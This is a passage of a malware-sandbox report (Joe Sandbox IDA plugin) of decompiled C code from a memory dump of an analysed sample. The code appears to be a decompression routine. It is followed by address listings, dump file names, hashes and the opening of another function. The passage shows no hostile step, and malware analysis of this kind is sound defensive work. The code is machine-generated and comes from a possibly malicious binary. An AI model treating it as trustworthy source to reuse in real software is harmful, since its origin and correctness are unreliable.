																						_t598 = __esi + 0x7c;
																						goto L1;
																					}
																				}
																				L114:
																				_t403 = _t632 >> 3;
																				__eflags = _t403;
																				 *(_t658 + 0x18) = _t403;
																				_t641 = _t403;
																				do {
																					L115:
																					E0007F4B0(_t646, _t468, 8);
																					_t658 = _t658 + 0xc;
																					_t468 = _t468 + 8;
																					_t646 = _t646 + 8;
																					_t632 = _t632 - 8;
																					_t641 = _t641 - 1;
																					__eflags = _t641;
																				} while (_t641 != 0);
																				L116:
																				_t638 =  *((intOrPtr*)(_t658 + 0x14));
																				goto L117;
																			}
																			L109:
																			_t615 = 8;
																			__eflags = _t632 - _t615;
																			if(_t632 < _t615) {
																				goto L117;
																			}
																			L110:
																			_t539 = _t632 >> 3;
																			__eflags = _t539;
																			do {
																				L111:
																				_t632 = _t632 - _t615;
																				 *_t646 =  *_t468;
																				 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																				 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																				 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																				 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																				 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																				 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																				_t412 =  *((intOrPtr*)(_t468 + 7));
																				_t468 = _t468 + _t615;
																				 *((char*)(_t646 + 7)) = _t412;
																				_t646 = _t646 + _t615;
																				_t539 = _t539 - 1;
																				__eflags = _t539;
																			} while (_t539 != 0);
																			goto L117;
																		}
																		L105:
																		_push( *(_t638 + 0xe6dc));
																		_push(_t638 + 0x7c);
																		_push( *(_t638 + 0x60));
																		goto L71;
																	}
																	L98:
																	_t417 = E00071E22(_t638, _t658 + 0x20);
																	__eflags = _t417;
																} while (_t417 != 0);
																goto L99;
															}
														}
														L134:
														_t531 = _t638 + (_t322 + 0xb5a) * 4;
														while(1) {
															L135:
															__eflags = _t605 -  *_t531;
															if(_t605 <  *_t531) {
																break;
															}
															L136:
															_t322 = _t322 + 1;
															_t531 = _t531 + 4;
															__eflags = _t322 - 0xf;
															if(_t322 < 0xf) {
																continue;
															}
															L137:
															goto L139;
														}
														L138:
														_t628 = _t322;
														goto L139;
													}
													L132:
													_t532 = 0x10;
													_t613 = _t605 >> _t532 - _t321;
													_t535 = ( *(_t613 + _t638 + 0x2dec) & 0x000000ff) +  *(_t643 + 4);
													 *_t643 =  *_t643 + (_t535 >> 3);
													 *(_t643 + 4) = _t535 & 0x00000007;
													_t326 =  *(_t638 + 0x31ec + _t613 * 2) & 0x0000ffff;
													goto L140;
												} else {
													goto L130;
												}
												do {
													L130:
													 *_t493 =  *(_t493 - 4);
													_t493 = _t493 - 4;
													_t461 = _t461 - 1;
													__eflags = _t461;
												} while (_t461 != 0);
												goto L131;
											}
											L103:
											_t632 =  *(_t638 + 0x74);
											_t598 = _t638 + 0x7c;
											__eflags = _t632;
										}
										L97:
										_push(_t658 + 0x20);
										_t414 = E00073952(_t638, _t643);
										__eflags = _t414;
										if(_t414 == 0) {
											goto L99;
										}
										goto L98;
									}
									L32:
									_t634 = _t460 - 0x106;
									__eflags = _t634 - 8;
									if(_t634 >= 8) {
										_t478 = (_t634 >> 2) - 1;
										_t634 = (_t634 & 0x00000003 | 0x00000004) << _t478;
										__eflags = _t634;
									} else {
										_t478 = 0;
									}
									_t632 = _t634 + 2;
									__eflags = _t478;
									if(_t478 != 0) {
										_t444 = E0006A800(_t643);
										_t582 = 0x10;
										_t632 = _t632 + (_t444 >> _t582 - _t478);
										_t585 =  *(_t643 + 4) + _t478;
										 *_t643 =  *_t643 + (_t585 >> 3);
										_t586 = _t585 & 0x00000007;
										__eflags = _t586;
										 *(_t643 + 4) = _t586;
									}
									_t418 = E0006A800(_t643);
									_t419 =  *(_t638 + 0x1010);
									_t617 = _t418 & 0x0000fffe;
									__eflags = _t617 -  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4));
									if(_t617 >=  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4))) {
										L39:
										_t479 = 0xf;
										_t420 = _t419 + 1;
										__eflags = _t420 - _t479;
										if(_t420 >= _t479) {
											L45:
											_t546 =  *(_t643 + 4) + _t479;
											 *(_t643 + 4) = _t546 & 0x00000007;
											_t422 = _t546 >> 3;
											 *_t643 =  *_t643 + _t422;
											_t548 = 0x10;
											_t551 =  *((intOrPtr*)(_t638 + 0xfd0 + _t479 * 4)) + (_t617 -  *((intOrPtr*)(_t638 + 0xf8c + _t479 * 4)) >> _t548 - _t479);
											__eflags = _t551 -  *((intOrPtr*)(_t638 + 0xf8c));
											asm("sbb eax, eax");
											_t423 = _t422 & _t551;
											__eflags = _t423;
											_t424 =  *(_t638 + 0x1c14 + _t423 * 2) & 0x0000ffff;
											goto L46;
										}
										L40:
										_t575 = _t638 + (_t420 + 0x3e4) * 4;
										while(1) {
											L41:
											__eflags = _t617 -  *_t575;
											if(_t617 <  *_t575) {
												break;
											}
											L42:
											_t420 = _t420 + 1;
											_t575 = _t575 + 4;
											__eflags = _t420 - 0xf;
											if(_t420 < 0xf) {
												continue;
											}
											L43:
											goto L45;
										}
										L44:
										_t479 = _t420;
										goto L45;
									} else {
										L38:
										_t576 = 0x10;
										_t625 = _t617 >> _t576 - _t419;
										_t579 = ( *(_t625 + _t638 + 0x1014) & 0x000000ff) +  *(_t643 + 4);
										 *_t643 =  *_t643 + (_t579 >> 3);
										 *(_t643 + 4) = _t579 & 0x00000007;
										_t424 =  *(_t638 + 0x1414 + _t625 * 2) & 0x0000ffff;
										L46:
										_t425 = _t424 & 0x0000ffff;
										__eflags = _t425 - 4;
										if(_t425 >= 4) {
											_t643 = (_t425 >> 1) - 1;
											_t425 = (_t425 & 0x00000001 | 0x00000002) << _t643;
											__eflags = _t425;
										} else {
											_t643 = 0;
										}
										_t428 = _t425 + 1;
										 *(_t658 + 0x18) = _t428;
										_t471 = _t428;
										 *(_t658 + 0x10) = _t471;
										__eflags = _t643;
										if(_t643 == 0) {
											L64:
											_t643 = _t638 + 4;
											goto L65;
										} else {
											L50:
											__eflags = _t643 - 4;
											if(__eflags < 0) {
												L72:
												_t359 = E0007815A(_t638 + 4);
												_t514 = 0x20;
												_t471 = (_t359 >> _t514 - _t643) +  *(_t658 + 0x18);
												_t517 =  *(_t638 + 8) + _t643;
												 *(_t658 + 0x10) = _t471;
												_t643 = _t638 + 4;
												 *_t643 =  *_t643 + (_t517 >> 3);
												 *(_t643 + 4) = _t517 & 0x00000007;
												L65:
												__eflags = _t471 - 0x100;
												if(_t471 > 0x100) {
													_t632 = _t632 + 1;
													__eflags = _t471 - 0x2000;
													if(_t471 > 0x2000) {
														_t632 = _t632 + 1;
														__eflags = _t471 - 0x40000;
														if(_t471 > 0x40000) {
															_t632 = _t632 + 1;
															__eflags = _t632;
														}
													}
												}
												 *(_t638 + 0x6c) =  *(_t638 + 0x68);
												 *(_t638 + 0x68) =  *(_t638 + 0x64);
												 *(_t638 + 0x64) =  *(_t638 + 0x60);
												 *(_t638 + 0x60) = _t471;
												__eflags =  *((char*)(_t638 + 0x4c44));
												 *(_t638 + 0x74) = _t632;
												if( *((char*)(_t638 + 0x4c44)) == 0) {
													L73:
													_t598 = _t638 + 0x7c;
													_t519 =  *_t598;
													_t366 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
													_t651 = _t519 - _t471;
													__eflags = _t651 - _t366;
													if(_t651 >= _t366) {
														L92:
														__eflags = _t632;
														if(_t632 == 0) {
															goto L161;
														}
														L93:
														_t472 =  *(_t638 + 0xe6dc);
														do {
															L94:
															_t473 = _t472 & _t651;
															_t651 = _t651 + 1;
															 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)(_t473 +  *((intOrPtr*)(_t638 + 0x4b40))));
															_t598 = _t638 + 0x7c;
															_t472 =  *(_t638 + 0xe6dc);
															 *_t598 =  *_t598 + 0x00000001 & _t472;
															_t632 = _t632 - 1;
															__eflags = _t632;
														} while (_t632 != 0);
														goto L161;
													}
													L74:
													__eflags = _t519 - _t366;
													if(_t519 >= _t366) {
														goto L92;
													}
													L75:
													_t371 =  *((intOrPtr*)(_t638 + 0x4b40));
													_t474 = _t371 + _t651;
													_t652 = _t371 + _t519;
													 *_t598 = _t519 + _t632;
													__eflags =  *(_t658 + 0x10) - _t632;
													if( *(_t658 + 0x10) >= _t632) {
														L80:
														__eflags = _t632 - 8;
														if(_t632 < 8) {
															L84:
															__eflags = _t632;
															if(_t632 != 0) {
																 *_t652 =  *_t474;
																__eflags = _t632 - 1;
																if(_t632 > 1) {
																	 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
																	__eflags = _t632 - 2;
																	if(_t632 > 2) {
																		 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
																		__eflags = _t632 - 3;
																		if(_t632 > 3) {
																			 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
																			__eflags = _t632 - 4;
																			if(_t632 > 4) {
																				 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
																				__eflags = _t632 - 5;
																				if(_t632 > 5) {
																					 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 > 6) {
																						 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
																					}
																				}
																			}
																		}
																	}
																}
															}
															goto L161;
														}
														L81:
														_t381 = _t632 >> 3;
														__eflags = _t381;
														 *(_t658 + 0x18) = _t381;
														_t640 = _t381;
														do {
															L82:
															E0007F4B0(_t652, _t474, 8);
															_t658 = _t658 + 0xc;
															_t474 = _t474 + 8;
															_t652 = _t652 + 8;
															_t632 = _t632 - 8;
															_t640 = _t640 - 1;
															__eflags = _t640;
														} while (_t640 != 0);
														_t638 =  *((intOrPtr*)(_t658 + 0x14));
														_t598 =  *(_t658 + 0x1c);
														goto L84;
													}
													L76:
													__eflags = _t632 - 8;
													if(_t632 < 8) {
														goto L84;
													}
													L77:
													_t522 = _t632 >> 3;
													__eflags = _t522;
													do {
														L78:
														_t632 = _t632 - 8;
														 *_t652 =  *_t474;
														 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
														 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
														 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
														 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
														 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
														 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
														_t390 =  *((intOrPtr*)(_t474 + 7));
														_t474 = _t474 + 8;
														 *((char*)(_t652 + 7)) = _t390;
														_t652 = _t652 + 8;
														_t522 = _t522 - 1;
														__eflags = _t522;
													} while (_t522 != 0);
													goto L84;
												} else {
													L70:
													_push( *(_t638 + 0xe6dc));
													_push(_t638 + 0x7c);
													_push(_t471);
													goto L71;
												}
											}
											L51:
											if(__eflags <= 0) {
												_t656 = _t638 + 4;
											} else {
												_t439 = E0007815A(_t638 + 4);
												_t569 = 0x24;
												_t572 = _t643 - 4 +  *(_t638 + 8);
												_t656 = _t638 + 4;
												_t471 = (_t439 >> _t569 - _t643 << 4) +  *(_t658 + 0x18);
												 *_t656 =  *_t656 + (_t572 >> 3);
												 *(_t656 + 4) = _t572 & 0x00000007;
											}
											_t429 = E0006A800(_t656);
											_t430 =  *(_t638 + 0x1efc);
											_t621 = _t429 & 0x0000fffe;
											__eflags = _t621 -  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4));
											if(_t621 >=  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4))) {
												L56:
												_t657 = 0xf;
												_t431 = _t430 + 1;
												__eflags = _t431 - _t657;
												if(_t431 >= _t657) {
													L62:
													_t555 =  *(_t638 + 8) + _t657;
													 *(_t638 + 8) = _t555 & 0x00000007;
													_t433 = _t555 >> 3;
													 *(_t638 + 4) =  *(_t638 + 4) + _t433;
													_t557 = 0x10;
													_t560 =  *((intOrPtr*)(_t638 + 0x1ebc + _t657 * 4)) + (_t621 -  *((intOrPtr*)(_t638 + 0x1e78 + _t657 * 4)) >> _t557 - _t657);
													__eflags = _t560 -  *((intOrPtr*)(_t638 + 0x1e78));
													asm("sbb eax, eax");
													_t434 = _t433 & _t560;
													__eflags = _t434;
													_t435 =  *(_t638 + 0x2b00 + _t434 * 2) & 0x0000ffff;
													goto L63;
												}
												L57:
												_t562 = _t638 + (_t431 + 0x79f) * 4;
												while(1) {
													L58:
													__eflags = _t621 -  *_t562;
													if(_t621 <  *_t562) {
														break;
													}
													L59:
													_t431 = _t431 + 1;
													_t562 = _t562 + 4;
													__eflags = _t431 - 0xf;
													if(_t431 < 0xf) {
														continue;
													}
													L60:
													goto L62;
												}
												L61:
												_t657 = _t431;
												goto L62;
											} else {
												L55:
												_t563 = 0x10;
												_t624 = _t621 >> _t563 - _t430;
												_t566 = ( *(_t624 + _t638 + 0x1f00) & 0x000000ff) +  *(_t656 + 4);
												 *_t656 =  *_t656 + (_t566 >> 3);
												 *(_t656 + 4) = _t566 & 0x00000007;
												_t435 =  *(_t638 + 0x2300 + _t624 * 2) & 0x0000ffff;
												L63:
												_t471 = _t471 + (_t435 & 0x0000ffff);
												__eflags = _t471;
												 *(_t658 + 0x10) = _t471;
												goto L64;
											}
										}
									}
								}
								L28:
								__eflags =  *((char*)(_t638 + 0x4c44));
								if( *((char*)(_t638 + 0x4c44)) == 0) {
									L30:
									_t598 = _t638 + 0x7c;
									 *( *((intOrPtr*)(_t638 + 0x4b40)) +  *_t598) = _t460;
									 *_t598 =  *_t598 + 1;
									continue;
								}
								L29:
								 *(_t638 + 0x7c) =  *(_t638 + 0x7c) + 1;
								 *(E00071BAD(_t638 + 0x4b44,  *(_t638 + 0x7c))) = _t460;
								goto L0;
							}
						}
						L13:
						__eflags = _t483 -  *_t598;
						if(_t483 ==  *_t598) {
							goto L18;
						}
						L14:
						E00074BB3(_t638);
						_t415 =  *((intOrPtr*)(_t638 + 0x4c5c));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c4c));
						if(__eflags > 0) {
							goto L100;
						}
						L15:
						if(__eflags < 0) {
							L17:
							__eflags =  *((char*)(_t638 + 0x4c50));
							if( *((char*)(_t638 + 0x4c50)) != 0) {
								L162:
								 *((char*)(_t638 + 0x4c60)) = 0;
								goto L100;
							}
							goto L18;
						}
						L16:
						_t415 =  *((intOrPtr*)(_t638 + 0x4c58));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c48));
						if(_t415 >  *((intOrPtr*)(_t638 + 0x4c48))) {
							goto L100;
						}
						goto L17;
					}
				}
			}

0x00075c77
0x00075c77
0x00075c77
0x00075c77
0x00075c77
0x00075c7a
0x00075c7a
0x00075c80
0x00075c8b
0x00000000
0x00075c8d
0x00075c8d
0x00075c8d
0x00075c93
0x00075c93
0x00075c9c
0x00075c9f
0x00000000
0x00000000
0x00075cae
0x00075cb5
0x00076260
0x00076262
0x00076267
0x0007626e
0x0007626e
0x00075cbb
0x00075cbb
0x00075cbc
0x00075cbf
0x00075cc6
0x00000000
0x00000000
0x00075ccc
0x00075cd4
0x00075cd5
0x00075cd6
0x00075cd7
0x00075cde
0x00000000
0x00075ce0
0x00000000
0x00075ce0
0x00075cde
0x00075ce5
0x00075ce7
0x00075cec
0x00075cee
0x00000000
0x00075cf4
0x00075cf4
0x00075cf4
0x00075cf7
0x00075cf7
0x00075d07
0x00075d0c
0x00075d4c
0x00075d4e
0x00075d55
0x00075d5b
0x00075d61
0x00075d68
0x00075d94
0x00075d96
0x00075d97
0x00075d98
0x00075d9a
0x00075db3
0x00075db6
0x00075dbd
0x00075dc0
0x00075dc3
0x00075dcf
0x00075ddb
0x00075ddd
0x00075de3
0x00075de5
0x00075de5
0x00075de7
0x00000000
0x00075d9c
0x00075d9f
0x00075da2
0x00075da2
0x00075da2
0x00075da4
0x00075db1
0x00075db1
0x00075db1
0x00075da6
0x00075da6
0x00075da7
0x00075daa
0x00075dad
0x00000000
0x00075daf
0x00000000
0x00075daf
0x00075dad
0x00000000
0x00075da2
0x00075d6a
0x00075d6c
0x00075d6f
0x00075d79
0x00075d81
0x00075d87
0x00075d8a
0x00075def
0x00075def
0x00075df5
0x00075e31
0x00075e31
0x00075e37
0x00076233
0x00076233
0x00076239
0x00076271
0x00076271
0x00076277
0x00076414
0x00076414
0x00076414
0x0007641d
0x00076420
0x00076422
0x00076426
0x00076435
0x00076437
0x0007643a
0x00076441
0x00076447
0x0007644d
0x00076454
0x00076480
0x00076482
0x00076483
0x00076484
0x00076486
0x000764a2
0x000764a5
0x000764ac
0x000764af
0x000764b2
0x000764be
0x000764ca
0x000764cc
0x000764d2
0x000764d4
0x000764d4
0x000764d6
0x000764de
0x000764de
0x000764e1
0x000764e4
0x000764f5
0x000764f8
0x000764f8
0x000764e6
0x000764e6
0x000764e6
0x000764fa
0x000764fd
0x000764ff
0x00076503
0x0007650a
0x00076512
0x00076514
0x0007651b
0x0007651e
0x0007651e
0x00076521
0x00076521
0x00076524
0x0007652b
0x0007652f
0x00076532
0x00076544
0x00076544
0x0007654f
0x00076551
0x00076556
0x00076558
0x000765fd
0x000765fd
0x000765ff
0x00075c77
0x00075c77
0x00075c77
0x00075c77
0x00000000
0x00075c77
0x00075c77
0x00076605
0x00076605
0x0007660b
0x0007660b
0x00076611
0x00076616
0x0007661a
0x0007661d
0x00076622
0x0007662b
0x0007662d
0x0007662d
0x0007662d
0x00000000
0x0007660b
0x0007655e
0x0007655e
0x00076560
0x00000000
0x00000000
0x00076566
0x00076566
0x0007656c
0x0007656e
0x00076574
0x00076577
0x00076579
0x000765ca
0x000765ca
0x000765cd
0x00000000
0x00000000
0x000765d3
0x000765d5
0x000765d5
0x000765d8
0x000765dc
0x000765de
0x000765de
0x000765e2
0x000765e7
0x000765ea
0x000765ed
0x000765f0
0x000765f3
0x000765f3
0x000765f3
0x00000000
0x000765f8
0x0007657b
0x0007657d
0x0007657e
0x00076580
0x00000000
0x00000000
0x00076586
0x00076588
0x00076588
0x0007658b
0x0007658b
0x0007658d
0x0007658f
0x00076595
0x0007659b
0x000765a1
0x000765a7
0x000765ad
0x000765b3
0x000765b6
0x000765b9
0x000765bb
0x000765be
0x000765c0
0x000765c0
0x000765c0
0x00000000
0x00076534
0x00076534
0x00076534
0x0007653d
0x0007653e
0x00076092
0x00076092
0x00076099
0x0007609e
0x00075c77
0x00075c77
0x00075c77
0x00075c77
0x00075c77
0x00075c7a
0x00075c7a
0x00075c7a
0x00075c80
0x00075c8b
0x00000000
0x00075c8d
0x00075c8d
0x00075c8d
0x00000000
0x00075c8b
0x00000000
0x00075c7a
0x0007628b
0x00076292
0x000762a6
0x000762a6
0x000762b1
0x000762b4
0x000762b9
0x000762bb
0x000762bd
0x000763da
0x000763da
0x000763dc
0x00075c77
0x00075c77
0x00075c77
0x00075c77
0x00075c7a
0x00075c80
0x00075c8b
0x00000000
0x00075c8d
0x00075c8d
0x00075c8d
0x00075c8b
0x00075c77
0x000763e2
0x000763e2
0x000763e8
0x000763e8
0x000763ee
0x000763f3
0x000763f7
0x000763fa
0x000763ff
0x00076408
0x0007640a
0x0007640a
0x0007640a
0x00076632
0x00076632
0x00000000
0x00076632
0x000762c3
0x000762c3
0x000762c5
0x00000000
0x00000000
0x000762cb
0x000762cb
0x000762d1
0x000762d3
0x000762d9
0x000762dc
0x000762de
0x00076328
0x00076328
0x0007632b
0x00076356
0x00076356
0x00076359
0x0007635b
0x00000000
0x00000000
0x00076361
0x00076363
0x00076366
0x00076369
0x0007636c
0x00000000
0x00000000
0x00076372
0x00076375
0x00076378
0x0007637b
0x0007637e
0x00000000
0x00000000
0x00076384
0x00076387
0x0007638a
0x0007638d
0x00076390
0x00000000
0x00000000
0x00076396
0x00076399
0x0007639c
0x0007639f
0x000763a2
0x00000000
0x00000000
0x000763a8
0x000763ab
0x000763ae
0x000763b1
0x000763b4
0x00000000
0x00000000
0x000763ba
0x000763bd
0x000763c0
0x000763c3
0x000763c6
0x00000000
0x00000000
0x000763cc
0x000763cf
0x00075c77
0x00075c77
0x00075c77
0x00075c77
0x00000000
0x00075c77
0x00075c77
0x0007632d
0x0007632f
0x0007632f
0x00076332
0x00076336
0x00076338
0x00076338
0x0007633c
0x00076341
0x00076344
0x00076347
0x0007634a
0x0007634d
0x0007634d
0x0007634d
0x00076352
0x00076352
0x00000000
0x00076352
0x000762e0
0x000762e2
0x000762e3
0x000762e5
0x00000000
0x00000000
0x000762e7
0x000762e9
0x000762e9
0x000762ec
0x000762ec
0x000762ee
0x000762f0
0x000762f6
0x000762fc
0x00076302
0x00076308
0x0007630e
0x00076314
0x00076317
0x0007631a
0x0007631c
0x0007631f
0x00076321
0x00076321
0x00076321
0x00000000
0x00076326
0x00076294
0x00076294
0x0007629d
0x0007629e
0x00000000
0x0007629e
0x0007624c
0x00076253
0x00076258
0x00076258
0x00000000
0x00075c77
0x00076532
0x00076488
0x0007648e
0x00076491
0x00076491
0x00076491
0x00076493
0x00000000
0x00000000
0x00076495
0x00076495
0x00076496
0x00076499
0x0007649c
0x00000000
0x00000000
0x0007649e
0x00000000
0x0007649e
0x000764a0
0x000764a0
0x00000000
0x000764a0
0x00076456
0x00076458
0x0007645b
0x00076465
0x0007646d
0x00076473
0x00076476
0x00000000
0x00000000
0x00000000
0x00000000
0x00076428
0x00076428
0x0007642b
0x0007642d
0x00076430
0x00076430
0x00076430
0x00000000
0x00076428
0x0007627d
0x0007627d
0x00076280
0x00076283
0x00076283
0x0007623b
0x00076241
0x00076243
0x00076248
0x0007624a
0x00000000
0x00000000
0x00000000
0x0007624a
0x00075e3d
0x00075e3d
0x00075e43
0x00075e46
0x00075e57
0x00075e5a
0x00075e5a
0x00075e48
0x00075e48
0x00075e48
0x00075e5c
0x00075e5f
0x00075e61
0x00075e65
0x00075e6c
0x00075e74
0x00075e76
0x00075e7d
0x00075e80
0x00075e80
0x00075e83
0x00075e83
0x00075e88
0x00075e8f
0x00075e95
0x00075e9b
0x00075ea2
0x00075ece
0x00075ed0
0x00075ed1
0x00075ed2
0x00075ed4
0x00075ef0
0x00075ef3
0x00075efa
0x00075efd
0x00075f00
0x00075f0c
0x00075f18
0x00075f1a
0x00075f20
0x00075f22
0x00075f22
0x00075f24
0x00000000
0x00075f24
0x00075ed6
0x00075edc
0x00075edf
0x00075edf
0x00075edf
0x00075ee1
0x00000000
0x00000000
0x00075ee3
0x00075ee3
0x00075ee4
0x00075ee7
0x00075eea
0x00000000
0x00000000
0x00075eec
0x00000000
0x00075eec
0x00075eee
0x00075eee
0x00000000
0x00075ea4
0x00075ea4
0x00075ea6
0x00075ea9
0x00075eb3
0x00075ebb
0x00075ec1
0x00075ec4
0x00075f2c
0x00075f2c
0x00075f2f
0x00075f32
0x00075f42
0x00075f45
0x00075f45
0x00075f34
0x00075f34
0x00075f34
0x00075f47
0x00075f48
0x00075f4c
0x00075f4e
0x00075f52
0x00075f54
0x00076048
0x00076048
0x00000000
0x00075f5a
0x00075f5a
0x00075f5a
0x00075f5d
0x000760a3
0x000760a6
0x000760af
0x000760b7
0x000760bb
0x000760bf
0x000760c6
0x000760c9
0x000760cf
0x0007604b
0x0007604b
0x00076051
0x00076053
0x00076054
0x0007605a
0x0007605c
0x0007605d
0x00076063
0x00076065
0x00076065
0x00076065
0x00076063
0x0007605a
0x00076069
0x0007606f
0x00076075
0x00076078
0x0007607b
0x00076082
0x00076085
0x000760d7
0x000760dd
0x000760e0
0x000760e2
0x000760e9
0x000760eb
0x000760ed
0x000761f9
0x000761f9
0x000761fb
0x00000000
0x00000000
0x00076201
0x00076201
0x00076207
0x00076207
0x0007620d
0x00076212
0x00076216
0x00076219
0x0007621e
0x00076227
0x00076229
0x00076229
0x00076229
0x00000000
0x0007622e
0x000760f3
0x000760f3
0x000760f5
0x00000000
0x00000000
0x000760fb
0x000760fb
0x00076101
0x00076104
0x0007610a
0x0007610c
0x00076110
0x0007615b
0x0007615b
0x0007615e
0x0007618d
0x0007618d
0x0007618f
0x00076197
0x0007619a
0x0007619d
0x000761a6
0x000761a9
0x000761ac
0x000761b5
0x000761b8
0x000761bb
0x000761c4
0x000761c7
0x000761ca
0x000761d3
0x000761d6
0x000761d9
0x000761e2
0x000761e5
0x000761e8
0x000761f1
0x000761f1
0x000761e8
0x000761d9
0x000761ca
0x000761bb
0x000761ac
0x0007619d
0x00000000
0x0007618f
0x00076160
0x00076162
0x00076162
0x00076165
0x00076169
0x0007616b
0x0007616b
0x0007616f
0x00076174
0x00076177
0x0007617a
0x0007617d
0x00076180
0x00076180
0x00076180
0x00076185
0x00076189
0x00000000
0x00076189
0x00076112
0x00076112
0x00076115
0x00000000
0x00000000
0x00076117
0x00076119
0x00076119
0x0007611c
0x0007611c
0x0007611e
0x00076121
0x00076127
0x0007612d
0x00076133
0x00076139
0x0007613f
0x00076145
0x00076148
0x0007614b
0x0007614e
0x00076151
0x00076154
0x00076154
0x00076154
0x00000000
0x00076087
0x00076087
0x00076087
0x00076090
0x00076091
0x00000000
0x00076091
0x00076085
0x00075f63
0x00075f63
0x00075f96
0x00075f65
0x00075f68
0x00075f71
0x00075f79
0x00075f7c
0x00075f84
0x00075f8b
0x00075f91
0x00075f91
0x00075f9b
0x00075fa2
0x00075fa8
0x00075fae
0x00075fb5
0x00075fe1
0x00075fe3
0x00075fe4
0x00075fe5
0x00075fe7
0x00076003
0x00076006
0x0007600d
0x00076010
0x00076013
0x0007601f
0x0007602b
0x0007602d
0x00076033
0x00076035
0x00076035
0x00076037
0x00000000
0x00076037
0x00075fe9
0x00075fef
0x00075ff2
0x00075ff2
0x00075ff2
0x00075ff4
0x00000000
0x00000000
0x00075ff6
0x00075ff6
0x00075ff7
0x00075ffa
0x00075ffd
0x00000000
0x00000000
0x00075fff
0x00000000
0x00075fff
0x00076001
0x00076001
0x00000000
0x00075fb7
0x00075fb7
0x00075fb9
0x00075fbc
0x00075fc6
0x00075fce
0x00075fd4
0x00075fd7
0x0007603f
0x00076042
0x00076042
0x00076044
0x00000000
0x00076044
0x00075fb5
0x00075f54
0x00075ea2
0x00075df7
0x00075df7
0x00075dfe
0x00075e1c
0x00075e22
0x00075e27
0x00075e2a
0x00000000
0x00075e2a
0x00075e00
0x00075e0d
0x00075e15
0x00000000
0x00075e15
0x00075d68
0x00075d0e
0x00075d0e
0x00075d10
0x00000000
0x00000000
0x00075d12
0x00075d14
0x00075d19
0x00075d1f
0x00075d25
0x00000000
0x00000000
0x00075d2b
0x00075d2b
0x00075d3f
0x00075d3f
0x00075d46
0x0007663a
0x0007663a
0x00000000
0x0007663a
0x00000000
0x00075d46
0x00075d2d
0x00075d2d
0x00075d33
0x00075d39
0x00000000
0x00000000
0x00000000
0x00075d39
0x00075c7a

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
Instruction ID: 6166458c8480a511d0bf087794b7bac189ee92f3d169077cdff2d665b63dc001
Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
Instruction Fuzzy Hash: BC62F671A04B858FCB29CF38C8906F9BBE1AF55304F08C56DD89F8B742D639A945CB18

Uniqueness

Uniqueness Score: -1.00%

Function 000770BF Relevance: .8, Instructions: 773
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E000770BF(void* __ecx) {
				intOrPtr* _t347;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t365;
				intOrPtr _t370;
				signed int _t380;
				char _t389;
				unsigned int _t390;
				signed int _t397;
				void* _t399;
				intOrPtr _t404;
				signed int _t407;
				char _t416;
				signed int _t417;
				char _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed short _t427;
				signed int _t430;
				void* _t435;
				intOrPtr _t440;
				signed int _t443;
				char _t452;
				unsigned int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t461;
				signed int _t462;
				signed short _t463;
				unsigned int _t467;
				unsigned int _t472;
				intOrPtr _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				unsigned int _t496;
				unsigned int _t498;
				intOrPtr _t499;
				signed int _t501;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				unsigned int _t510;
				void* _t512;
				signed int _t515;
				signed int* _t518;
				unsigned int _t521;
				void* _t523;
				signed int _t526;
				signed int _t529;
